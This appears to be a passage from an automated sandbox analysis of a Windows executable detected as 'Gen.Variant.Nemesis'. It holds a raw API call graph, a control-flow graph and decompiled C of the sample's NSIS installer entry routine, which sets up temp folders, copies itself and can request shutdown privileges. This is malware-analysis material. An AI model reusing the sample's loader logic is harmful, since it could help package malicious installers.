GlobalFree GlobalFree 5636->5637 4625 4023b2 4626 4023c0 4625->4626 4627 4023ba 4625->4627 4629 402da6 17 API calls 4626->4629 4630 4023ce 4626->4630 4628 402da6 17 API calls 4627->4628 4628->4626 4629->4630 4631 402da6 17 API calls 4630->4631 4633 4023dc 4630->4633 4631->4633 4632 402da6 17 API calls 4634 4023e5 WritePrivateProfileStringW 4632->4634 4633->4632 5643 402434 5644 402467 5643->5644 5645 40243c 5643->5645 5646 402da6 17 API calls 5644->5646 5647 402de6 17 API calls 5645->5647 5648 40246e 5646->5648 5649 402443 5647->5649 5654 402e64 5648->5654 5651 40247b 5649->5651 5652 402da6 17 API calls 5649->5652 5653 402454 RegDeleteValueW RegCloseKey 5652->5653 5653->5651 5655 402e71 5654->5655 5656 402e78 5654->5656 5655->5651 5656->5655 5658 402ea9 5656->5658 5659 4063aa RegOpenKeyExW 5658->5659 5660 402ed7 5659->5660 5661 402f81 5660->5661 5662 402ee7 RegEnumValueW 5660->5662 5663 402f0a 5660->5663 5661->5655 5662->5663 5664 402f71 RegCloseKey 5662->5664 5663->5664 5665 402f46 RegEnumKeyW 5663->5665 5666 402f4f RegCloseKey 5663->5666 5669 402ea9 6 API calls 5663->5669 5664->5661 5665->5663 5665->5666 5667 40690a 5 API calls 5666->5667 5668 402f5f 5667->5668 5668->5661 5670 402f63 RegDeleteKeyW 5668->5670 5669->5663 5670->5661 5671 401735 5672 402da6 17 API calls 5671->5672 5673 40173c SearchPathW 5672->5673 5674 401757 5673->5674 4635 71082a7f 4636 71082acf 4635->4636 4637 71082a8f VirtualProtect 4635->4637 4637->4636 5675 4014b8 5676 4014be 5675->5676 5677 401389 2 API calls 5676->5677 5678 4014c6 5677->5678 5679 401d38 5680 402d84 17 API calls 5679->5680 5681 401d3f 5680->5681 5682 402d84 17 API calls 5681->5682 5683 401d4b GetDlgItem 5682->5683 5684 402638 5683->5684 5685 71081774 5686 710817a3 5685->5686 5687 71081bff 22 API calls 5686->5687 5688 710817aa 5687->5688 5689 710817bd 5688->5689 5690 710817b1 5688->5690 5692 710817e4 5689->5692 5693 710817c7 5689->5693 5691 71081312 2 API calls 5690->5691 5696 710817bb 5691->5696 5694 710817ea 5692->5694 5695 7108180e 5692->5695 5697 710815dd 3 API calls 5693->5697 5698 71081654 3 API calls 5694->5698 5699 710815dd 3 API calls 5695->5699 5700 710817cc 5697->5700 5701 710817ef 5698->5701 5699->5696 5702 71081654 3 API calls 5700->5702 5704 71081312 2 API calls 5701->5704 5703 710817d2 5702->5703 5705 71081312 2 API calls 5703->5705 5706 710817f5 GlobalFree 5704->5706 5707 710817d8 GlobalFree 5705->5707 5706->5696 5708 71081809 GlobalFree 5706->5708 5707->5696 5708->5696 5709 40263e 5710 402652 5709->5710 5711 40266d 5709->5711 5712 402d84 17 API calls 5710->5712 5713 402672 5711->5713 5714 40269d 5711->5714 5722 402659 5712->5722 5715 402da6 17 API calls 5713->5715 5716 402da6 17 API calls 5714->5716 5717 402679 5715->5717 5718 4026a4 lstrlenW 5716->5718 5726 40655f WideCharToMultiByte 5717->5726 5718->5722 5720 40268d lstrlenA 5720->5722 5721 4026e7 5722->5721 5724 40610e 5 API calls 5722->5724 5725 4026d1 5722->5725 5723 4060df WriteFile 5723->5721 5724->5725 5725->5721 5725->5723 5726->5720

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 40352d-40357d SetErrorMode GetVersionExW 1 4035b7-4035be 0->1 2 40357f-4035b3 GetVersionExW 0->2 3 4035c0 1->3 4 4035c8-403608 1->4 2->1 3->4 5 40360a-403612 call 40690a 4->5 6 40361b 4->6 5->6 11 403614 5->11 8 403620-403634 call 40689a lstrlenA 6->8 13 403636-403652 call 40690a * 3 8->13 11->6 20 403663-4036c5 #17 OleInitialize SHGetFileInfoW call 40653d GetCommandLineW call 40653d 13->20 21 403654-40365a 13->21 28 4036c7-4036c9 20->28 29 4036ce-4036e1 call 405e39 CharNextW 20->29 21->20 25 40365c 21->25 25->20 28->29 32 4037d8-4037de 29->32 33 4037e4 32->33 34 4036e6-4036ec 32->34 37 4037f8-403812 GetTempPathW call 4034fc 33->37 35 4036f5-4036fb 34->35 36 4036ee-4036f3 34->36 38 403702-403706 35->38 39 4036fd-403701 35->39 36->35 36->36 47 403814-403832 GetWindowsDirectoryW lstrcatW call 4034fc 37->47 48 40386a-403882 DeleteFileW call 40307d 37->48 41 4037c6-4037d4 call 405e39 38->41 42 40370c-403712 38->42 39->38 41->32 58 4037d6-4037d7 41->58 45 403714-40371b 42->45 46 40372c-403765 42->46 51 403722 45->51 52 40371d-403720 45->52 53 403781-4037bb 46->53 54 403767-40376c 46->54 47->48 62 403834-403864 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034fc 47->62 64 403888-40388e 48->64 65 403a59-403a67 call 403b12 OleUninitialize 48->65 51->46 52->46 52->51 56 4037c3-4037c5 53->56 57 4037bd-4037c1 53->57 54->53 60 40376e-403776 54->60 56->41 57->56 63 4037e6-4037f3 call 40653d 57->63 58->32 66 403778-40377b 60->66 67 40377d 60->67 62->48 62->65 63->37 69 403894-4038a7 call 405e39 64->69 70 403935-40393c call 403bec 64->70 79 403a69-403a78 call 405b9d ExitProcess 65->79 80 403a7e-403a84 65->80 66->53 66->67 67->53 84 4038f9-403906 69->84 85 4038a9-4038de 69->85 78 403941-403944 70->78 78->65 82 403a86-403a9b GetCurrentProcess OpenProcessToken 80->82 83 403afc-403b04 80->83 89 403acc-403ada call 40690a 82->89 90 403a9d-403ac6 LookupPrivilegeValueW AdjustTokenPrivileges 82->90 92 403b06 83->92 93 403b09-403b0c ExitProcess 83->93 86 403908-403916 call 405f14 84->86 87 403949-40395d call 405b08 lstrcatW 84->87 91 4038e0-4038e4 85->91 86->65 103 40391c-403932 call 40653d * 2 86->103 106 40396a-403984 lstrcatW lstrcmpiW 87->106 107 40395f-403965 lstrcatW 87->107 104 403ae8-403af3 ExitWindowsEx 89->104 105 403adc-403ae6 89->105 90->89 97 4038e6-4038eb 91->97 98 4038ed-4038f5 91->98 92->93 97->98 102 4038f7 97->102 98->91 98->102 102->84 103->70 104->83 111 403af5-403af7 call 40140b 104->111 105->104 105->111 108 403a57 106->108 109 40398a-40398d 106->109 107->106 108->65 112 403996 call 405aeb 109->112 113 40398f-403994 call 405a6e 109->113 111->83 121 40399b-4039ab SetCurrentDirectoryW 112->121 113->121 123 4039b8-4039e4 call 40653d 121->123 124 4039ad-4039b3 call 40653d 121->124 128 4039e9-403a04 call 40657a DeleteFileW 123->128 124->123 131 403a44-403a4e 128->131 132 403a06-403a16 CopyFileW 128->132 131->128 134 403a50-403a52 call 4062fd 131->134 132->131 133 403a18-403a38 call 4062fd call 40657a call 405b20 132->133 133->131 142 403a3a-403a41 CloseHandle 133->142 134->108 142->131
                                                  C-Code - Quality: 79%
                                                  			_entry_() {
                                                  				WCHAR* _v8;
                                                  				signed int _v12;
                                                  				void* _v16;
                                                  				signed int _v20;
                                                  				int _v24;
                                                  				int _v28;
                                                  				struct _TOKEN_PRIVILEGES _v40;
                                                  				signed char _v42;
                                                  				int _v44;
                                                  				signed int _v48;
                                                  				intOrPtr _v278;
                                                  				signed short _v310;
                                                  				struct _OSVERSIONINFOW _v324;
                                                  				struct _SHFILEINFOW _v1016;
                                                  				intOrPtr* _t88;
                                                  				WCHAR* _t92;
                                                  				char* _t94;
                                                  				void _t97;
                                                  				void* _t116;
                                                  				WCHAR* _t118;
                                                  				signed int _t120;
                                                  				intOrPtr* _t124;
                                                  				void* _t138;
                                                  				void* _t144;
                                                  				void* _t149;
                                                  				void* _t153;
                                                  				void* _t158;
                                                  				signed int _t168;
                                                  				void* _t171;
                                                  				void* _t176;
                                                  				intOrPtr _t178;
                                                  				intOrPtr _t179;
                                                  				intOrPtr* _t180;
                                                  				int _t189;
                                                  				void* _t190;
                                                  				void* _t199;
                                                  				signed int _t205;
                                                  				signed int _t210;
                                                  				signed int _t215;
                                                  				signed int _t217;
                                                  				int* _t219;
                                                  				signed int _t227;
                                                  				signed int _t230;
                                                  				CHAR* _t232;
                                                  				char* _t233;
                                                  				signed int _t234;
                                                  				WCHAR* _t235;
                                                  				void* _t251;
                                                  
                                                  				_t217 = 0x20;
                                                  				_t189 = 0;
                                                  				_v24 = 0;
                                                  				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                  				_v20 = 0;
                                                  				SetErrorMode(0x8001); // executed
                                                  				_v324.szCSDVersion = 0;
                                                  				_v48 = 0;
                                                  				_v44 = 0;
                                                  				_v324.dwOSVersionInfoSize = 0x11c;
                                                  				if(GetVersionExW( &_v324) == 0) {
                                                  					_v324.dwOSVersionInfoSize = 0x114;
                                                  					GetVersionExW( &_v324);
                                                  					asm("sbb eax, eax");
                                                  					_v42 = 4;
                                                  					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                                  				}
                                                  				if(_v324.dwMajorVersion < 0xa) {
                                                  					_v310 = _v310 & 0x00000000;
                                                  				}
                                                  				 *0x434fb8 = _v324.dwBuildNumber;
                                                  				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                                  				if( *0x434fbe != 0x600) {
                                                  					_t180 = E0040690A(_t189);
                                                  					if(_t180 != _t189) {
                                                  						 *_t180(0xc00);
                                                  					}
                                                  				}
                                                  				_t232 = "UXTHEME";
                                                  				do {
                                                  					E0040689A(_t232); // executed
                                                  					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
                                                  				} while ( *_t232 != 0);
                                                  				E0040690A(0xb);
                                                  				 *0x434f04 = E0040690A(9);
                                                  				_t88 = E0040690A(7);
                                                  				if(_t88 != _t189) {
                                                  					_t88 =  *_t88(0x1e);
                                                  					if(_t88 != 0) {
                                                  						 *0x434fbc =  *0x434fbc | 0x00000080;
                                                  					}
                                                  				}
                                                  				__imp__#17();
                                                  				__imp__OleInitialize(_t189); // executed
                                                  				 *0x434fc0 = _t88;
                                                  				SHGetFileInfoW(0x42b228, _t189,  &_v1016, 0x2b4, _t189); // executed
                                                  				E0040653D(0x433f00, L"NSIS Error");
                                                  				_t92 = GetCommandLineW();
                                                  				_t233 = L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe\" ";
                                                  				E0040653D(_t233, _t92);
                                                  				_t94 = _t233;
                                                  				_t234 = 0x22;
                                                  				 *0x434f00 = 0x400000;
                                                  				_t251 = L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe\" " - _t234; // 0x22
                                                  				if(_t251 == 0) {
                                                  					_t217 = _t234;
                                                  					_t94 =  &M00440002;
                                                  				}
                                                  				_t199 = CharNextW(E00405E39(_t94, _t217));
                                                  				_v16 = _t199;
                                                  				while(1) {
                                                  					_t97 =  *_t199;
                                                  					_t252 = _t97 - _t189;
                                                  					if(_t97 == _t189) {
                                                  						break;
                                                  					}
                                                  					_t210 = 0x20;
                                                  					__eflags = _t97 - _t210;
                                                  					if(_t97 != _t210) {
                                                  						L17:
                                                  						__eflags =  *_t199 - _t234;
                                                  						_v12 = _t210;
                                                  						if( *_t199 == _t234) {
                                                  							_v12 = _t234;
                                                  							_t199 = _t199 + 2;
                                                  							__eflags = _t199;
                                                  						}
                                                  						__eflags =  *_t199 - 0x2f;
                                                  						if( *_t199 != 0x2f) {
                                                  							L32:
                                                  							_t199 = E00405E39(_t199, _v12);
                                                  							__eflags =  *_t199 - _t234;
                                                  							if(__eflags == 0) {
                                                  								_t199 = _t199 + 2;
                                                  								__eflags = _t199;
                                                  							}
                                                  							continue;
                                                  						} else {
                                                  							_t199 = _t199 + 2;
                                                  							__eflags =  *_t199 - 0x53;
                                                  							if( *_t199 != 0x53) {
                                                  								L24:
                                                  								asm("cdq");
                                                  								asm("cdq");
                                                  								_t215 = L"NCRC" & 0x0000ffff;
                                                  								asm("cdq");
                                                  								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
                                                  								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
                                                  								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
                                                  									L29:
                                                  									asm("cdq");
                                                  									asm("cdq");
                                                  									_t210 = L" /D=" & 0x0000ffff;
                                                  									asm("cdq");
                                                  									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
                                                  									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
                                                  									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
                                                  										L31:
                                                  										_t234 = 0x22;
                                                  										goto L32;
                                                  									}
                                                  									__eflags =  *_t199 - _t230;
                                                  									if( *_t199 == _t230) {
                                                  										 *(_t199 - 4) = _t189;
                                                  										__eflags = _t199;
                                                  										E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t199);
                                                  										L37:
                                                  										_t235 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
                                                  										GetTempPathW(0x400, _t235);
                                                  										_t116 = E004034FC(_t199, _t252);
                                                  										_t253 = _t116;
                                                  										if(_t116 != 0) {
                                                  											L40:
                                                  											DeleteFileW(L"1033"); // executed
                                                  											_t118 = E0040307D(_t255, _v20); // executed
                                                  											_v8 = _t118;
                                                  											if(_t118 != _t189) {
                                                  												L68:
                                                  												E00403B12();
                                                  												__imp__OleUninitialize();
                                                  												if(_v8 == _t189) {
                                                  													if( *0x434f94 == _t189) {
                                                  														L77:
                                                  														_t120 =  *0x434fac;
                                                  														if(_t120 != 0xffffffff) {
                                                  															_v24 = _t120;
                                                  														}
                                                  														ExitProcess(_v24);
                                                  													}
                                                  													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                                  														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                                  														_v40.PrivilegeCount = 1;
                                                  														_v28 = 2;
                                                  														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
                                                  													}
                                                  													_t124 = E0040690A(4);
                                                  													if(_t124 == _t189) {
                                                  														L75:
                                                  														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                                  															goto L77;
                                                  														}
                                                  														goto L76;
                                                  													} else {
                                                  														_push(0x80040002);
                                                  														_push(0x25);
                                                  														_push(_t189);
                                                  														_push(_t189);
                                                  														_push(_t189);
                                                  														if( *_t124() == 0) {
                                                  															L76:
                                                  															E0040140B(9);
                                                  															goto L77;
                                                  														}
                                                  														goto L75;
                                                  													}
                                                  												}
                                                  												E00405B9D(_v8, 0x200010);
                                                  												ExitProcess(2);
                                                  											}
                                                  											if( *0x434f1c == _t189) {
                                                  												L51:
                                                  												 *0x434fac =  *0x434fac | 0xffffffff;
                                                  												_v24 = E00403BEC(_t265);
                                                  												goto L68;
                                                  											}
                                                  											_t219 = E00405E39(L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe\" ", _t189);
                                                  											if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe\" ") {
                                                  												L48:
                                                  												_t264 = _t219 - L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe\" ";
                                                  												_v8 = L"Error launching installer";
                                                  												if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe\" ") {
                                                  													_t190 = E00405B08(__eflags);
                                                  													lstrcatW(_t235, L"~nsu");
                                                  													__eflags = _t190;
                                                  													if(_t190 != 0) {
                                                  														lstrcatW(_t235, "A");
                                                  													}
                                                  													lstrcatW(_t235, L".tmp");
                                                  													_t220 = L"C:\\Users\\Arthur\\Desktop";
                                                  													_t138 = lstrcmpiW(_t235, L"C:\\Users\\Arthur\\Desktop");
                                                  													__eflags = _t138;
                                                  													if(_t138 == 0) {
                                                  														L67:
                                                  														_t189 = 0;
                                                  														__eflags = 0;
                                                  														goto L68;
                                                  													} else {
                                                  														__eflags = _t190;
                                                  														_push(_t235);
                                                  														if(_t190 == 0) {
                                                  															E00405AEB();
                                                  														} else {
                                                  															E00405A6E();
                                                  														}
                                                  														SetCurrentDirectoryW(_t235);
                                                  														__eflags = L"C:\\Users\\Arthur\\AppData\\Local\\Temp"; // 0x43
                                                  														if(__eflags == 0) {
                                                  															E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t220);
                                                  														}
                                                  														E0040653D(0x436000, _v16);
                                                  														_t202 = "A" & 0x0000ffff;
                                                  														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                  														__eflags = _t144;
                                                  														_v12 = 0x1a;
                                                  														 *0x436800 = _t144;
                                                  														do {
                                                  															E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
                                                  															DeleteFileW(0x42aa28);
                                                  															__eflags = _v8;
                                                  															if(_v8 != 0) {
                                                  																_t149 = CopyFileW(L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe", 0x42aa28, 1);
                                                  																__eflags = _t149;
                                                  																if(_t149 != 0) {
                                                  																	E004062FD(_t202, 0x42aa28, 0);
                                                  																	E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
                                                  																	_t153 = E00405B20(0x42aa28);
                                                  																	__eflags = _t153;
                                                  																	if(_t153 != 0) {
                                                  																		CloseHandle(_t153);
                                                  																		_v8 = 0;
                                                  																	}
                                                  																}
                                                  															}
                                                  															 *0x436800 =  *0x436800 + 1;
                                                  															_t61 =  &_v12;
                                                  															 *_t61 = _v12 - 1;
                                                  															__eflags =  *_t61;
                                                  														} while ( *_t61 != 0);
                                                  														E004062FD(_t202, _t235, 0);
                                                  														goto L67;
                                                  													}
                                                  												}
                                                  												 *_t219 = _t189;
                                                  												_t222 =  &(_t219[2]);
                                                  												_t158 = E00405F14(_t264,  &(_t219[2]));
                                                  												_t265 = _t158;
                                                  												if(_t158 == 0) {
                                                  													goto L68;
                                                  												}
                                                  												E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t222);
                                                  												E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t222);
                                                  												_v8 = _t189;
                                                  												goto L51;
                                                  											}
                                                  											asm("cdq");
                                                  											asm("cdq");
                                                  											asm("cdq");
                                                  											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                  											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                                                  											while( *_t219 != _t205 || _t219[1] != _t168) {
                                                  												_t219 = _t219;
                                                  												if(_t219 >= L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe\" ") {
                                                  													continue;
                                                  												}
                                                  												break;
                                                  											}
                                                  											_t189 = 0;
                                                  											goto L48;
                                                  										}
                                                  										GetWindowsDirectoryW(_t235, 0x3fb);
                                                  										lstrcatW(_t235, L"\\Temp");
                                                  										_t171 = E004034FC(_t199, _t253);
                                                  										_t254 = _t171;
                                                  										if(_t171 != 0) {
                                                  											goto L40;
                                                  										}
                                                  										GetTempPathW(0x3fc, _t235);
                                                  										lstrcatW(_t235, L"Low");
                                                  										SetEnvironmentVariableW(L"TEMP", _t235);
                                                  										SetEnvironmentVariableW(L"TMP", _t235);
                                                  										_t176 = E004034FC(_t199, _t254);
                                                  										_t255 = _t176;
                                                  										if(_t176 == 0) {
                                                  											goto L68;
                                                  										}
                                                  										goto L40;
                                                  									}
                                                  									goto L31;
                                                  								}
                                                  								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
                                                  								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
                                                  									goto L29;
                                                  								}
                                                  								_t178 =  *((intOrPtr*)(_t199 + 8));
                                                  								__eflags = _t178 - 0x20;
                                                  								if(_t178 == 0x20) {
                                                  									L28:
                                                  									_t36 =  &_v20;
                                                  									 *_t36 = _v20 | 0x00000004;
                                                  									__eflags =  *_t36;
                                                  									goto L29;
                                                  								}
                                                  								__eflags = _t178 - _t189;
                                                  								if(_t178 != _t189) {
                                                  									goto L29;
                                                  								}
                                                  								goto L28;
                                                  							}
                                                  							_t179 =  *((intOrPtr*)(_t199 + 2));
                                                  							__eflags = _t179 - _t210;
                                                  							if(_t179 == _t210) {
                                                  								L23:
                                                  								 *0x434fa0 = 1;
                                                  								goto L24;
                                                  							}
                                                  							__eflags = _t179 - _t189;
                                                  							if(_t179 != _t189) {
                                                  								goto L24;
                                                  							}
                                                  							goto L23;
                                                  						}
                                                  					} else {
                                                  						goto L16;
                                                  					}
                                                  					do {
                                                  						L16:
                                                  						_t199 = _t199 + 2;
                                                  						__eflags =  *_t199 - _t210;
                                                  					} while ( *_t199 == _t210);
                                                  					goto L17;
                                                  				}
                                                  				goto L37;
                                                  			}



















































                                                  0x0040353b
                                                  0x0040353c
                                                  0x00403543
                                                  0x00403546
                                                  0x0040354d
                                                  0x00403550
                                                  0x00403563
                                                  0x00403569
                                                  0x0040356c
                                                  0x0040356f
                                                  0x0040357d
                                                  0x00403585
                                                  0x00403590
                                                  0x004035a9
                                                  0x004035ab
                                                  0x004035b3
                                                  0x004035b3
                                                  0x004035be
                                                  0x004035c0
                                                  0x004035c0
                                                  0x004035d5
                                                  0x004035fa
                                                  0x00403608
                                                  0x0040360b
                                                  0x00403612
                                                  0x00403619
                                                  0x00403619
                                                  0x00403612
                                                  0x0040361b
                                                  0x00403620
                                                  0x00403621
                                                  0x0040362d
                                                  0x00403631
                                                  0x00403638
                                                  0x00403646
                                                  0x0040364b
                                                  0x00403652
                                                  0x00403656
                                                  0x0040365a
                                                  0x0040365c
                                                  0x0040365c
                                                  0x0040365a
                                                  0x00403663
                                                  0x0040366a
                                                  0x00403670
                                                  0x00403688
                                                  0x00403698
                                                  0x0040369d
                                                  0x004036a3
                                                  0x004036aa
                                                  0x004036b1
                                                  0x004036b3
                                                  0x004036b4
                                                  0x004036be
                                                  0x004036c5
                                                  0x004036c7
                                                  0x004036c9
                                                  0x004036c9
                                                  0x004036dc
                                                  0x004036de
                                                  0x004037d8
                                                  0x004037d8
                                                  0x004037db
                                                  0x004037de
                                                  0x00000000
                                                  0x00000000
                                                  0x004036e8
                                                  0x004036e9
                                                  0x004036ec
                                                  0x004036f5
                                                  0x004036f5
                                                  0x004036f8
                                                  0x004036fb
                                                  0x004036fe
                                                  0x00403701
                                                  0x00403701
                                                  0x00403701
                                                  0x00403702
                                                  0x00403706
                                                  0x004037c6
                                                  0x004037cf
                                                  0x004037d1
                                                  0x004037d4
                                                  0x004037d7
                                                  0x004037d7
                                                  0x004037d7
                                                  0x00000000
                                                  0x0040370c
                                                  0x0040370d
                                                  0x0040370e
                                                  0x00403712
                                                  0x0040372c
                                                  0x00403733
                                                  0x00403746
                                                  0x00403747
                                                  0x0040375c
                                                  0x00403761
                                                  0x00403763
                                                  0x00403765
                                                  0x00403781
                                                  0x00403788
                                                  0x0040379b
                                                  0x0040379c
                                                  0x004037b1
                                                  0x004037b7
                                                  0x004037b9
                                                  0x004037bb
                                                  0x004037c3
                                                  0x004037c5
                                                  0x00000000
                                                  0x004037c5
                                                  0x004037bf
                                                  0x004037c1
                                                  0x004037e6
                                                  0x004037ea
                                                  0x004037f3
                                                  0x004037f8
                                                  0x004037fe
                                                  0x00403809
                                                  0x0040380b
                                                  0x00403810
                                                  0x00403812
                                                  0x0040386a
                                                  0x0040386f
                                                  0x00403878
                                                  0x0040387f
                                                  0x00403882
                                                  0x00403a59
                                                  0x00403a59
                                                  0x00403a5e
                                                  0x00403a67
                                                  0x00403a84
                                                  0x00403afc
                                                  0x00403afc
                                                  0x00403b04
                                                  0x00403b06
                                                  0x00403b06
                                                  0x00403b0c
                                                  0x00403b0c
                                                  0x00403a9b
                                                  0x00403aa7
                                                  0x00403ab8
                                                  0x00403abf
                                                  0x00403ac6
                                                  0x00403ac6
                                                  0x00403ace
                                                  0x00403ada
                                                  0x00403ae8
                                                  0x00403af3
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403adc
                                                  0x00403adc
                                                  0x00403add
                                                  0x00403adf
                                                  0x00403ae0
                                                  0x00403ae1
                                                  0x00403ae6
                                                  0x00403af5
                                                  0x00403af7
                                                  0x00000000
                                                  0x00403af7
                                                  0x00000000
                                                  0x00403ae6
                                                  0x00403ada
                                                  0x00403a71
                                                  0x00403a78
                                                  0x00403a78
                                                  0x0040388e
                                                  0x00403935
                                                  0x00403935
                                                  0x00403941
                                                  0x00000000
                                                  0x00403941
                                                  0x0040389f
                                                  0x004038a7
                                                  0x004038f9
                                                  0x004038f9
                                                  0x004038ff
                                                  0x00403906
                                                  0x00403954
                                                  0x00403956
                                                  0x0040395b
                                                  0x0040395d
                                                  0x00403965
                                                  0x00403965
                                                  0x00403970
                                                  0x00403975
                                                  0x0040397c
                                                  0x00403982
                                                  0x00403984
                                                  0x00403a57
                                                  0x00403a57
                                                  0x00403a57
                                                  0x00000000
                                                  0x0040398a
                                                  0x0040398a
                                                  0x0040398c
                                                  0x0040398d
                                                  0x00403996
                                                  0x0040398f
                                                  0x0040398f
                                                  0x0040398f
                                                  0x0040399c
                                                  0x004039a4
                                                  0x004039ab
                                                  0x004039b3
                                                  0x004039b3
                                                  0x004039c0
                                                  0x004039cc
                                                  0x004039d6
                                                  0x004039d6
                                                  0x004039d8
                                                  0x004039df
                                                  0x004039e9
                                                  0x004039f5
                                                  0x004039fb
                                                  0x00403a01
                                                  0x00403a04
                                                  0x00403a0e
                                                  0x00403a14
                                                  0x00403a16
                                                  0x00403a1a
                                                  0x00403a2b
                                                  0x00403a31
                                                  0x00403a36
                                                  0x00403a38
                                                  0x00403a3b
                                                  0x00403a41
                                                  0x00403a41
                                                  0x00403a38
                                                  0x00403a16
                                                  0x00403a44
                                                  0x00403a4b
                                                  0x00403a4b
                                                  0x00403a4b
                                                  0x00403a4b
                                                  0x00403a52
                                                  0x00000000
                                                  0x00403a52
                                                  0x00403984
                                                  0x00403908
                                                  0x0040390b
                                                  0x0040390f
                                                  0x00403914
                                                  0x00403916
                                                  0x00000000
                                                  0x00000000
                                                  0x00403922
                                                  0x0040392d
                                                  0x00403932
                                                  0x00000000
                                                  0x00403932
                                                  0x004038b0
                                                  0x004038c8
                                                  0x004038d9
                                                  0x004038da
                                                  0x004038de
                                                  0x004038e0
                                                  0x004038ee
                                                  0x004038f5
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004038f5
                                                  0x004038f7
                                                  0x00000000
                                                  0x004038f7
                                                  0x0040381a
                                                  0x00403826
                                                  0x0040382b
                                                  0x00403830
                                                  0x00403832
                                                  0x00000000
                                                  0x00000000
                                                  0x0040383a
                                                  0x00403842
                                                  0x00403853
                                                  0x0040385b
                                                  0x0040385d
                                                  0x00403862
                                                  0x00403864
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403864
                                                  0x00000000
                                                  0x004037c1
                                                  0x0040376a
                                                  0x0040376c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040376e
                                                  0x00403772
                                                  0x00403776
                                                  0x0040377d
                                                  0x0040377d
                                                  0x0040377d
                                                  0x0040377d
                                                  0x00000000
                                                  0x0040377d
                                                  0x00403778
                                                  0x0040377b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040377b
                                                  0x00403714
                                                  0x00403718
                                                  0x0040371b
                                                  0x00403722
                                                  0x00403722
                                                  0x00000000
                                                  0x00403722
                                                  0x0040371d
                                                  0x00403720
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403720
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004036ee
                                                  0x004036ee
                                                  0x004036ef
                                                  0x004036f0
                                                  0x004036f0
                                                  0x00000000
                                                  0x004036ee
                                                  0x00000000

                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008001), ref: 00403550
                                                  • GetVersionExW.KERNEL32(?), ref: 00403579
                                                  • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                                                  • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                                                  • OleInitialize.OLE32(00000000), ref: 0040366A
                                                  • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
                                                  • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe" ,00000020,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe" ,00000000), ref: 004036D6
                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
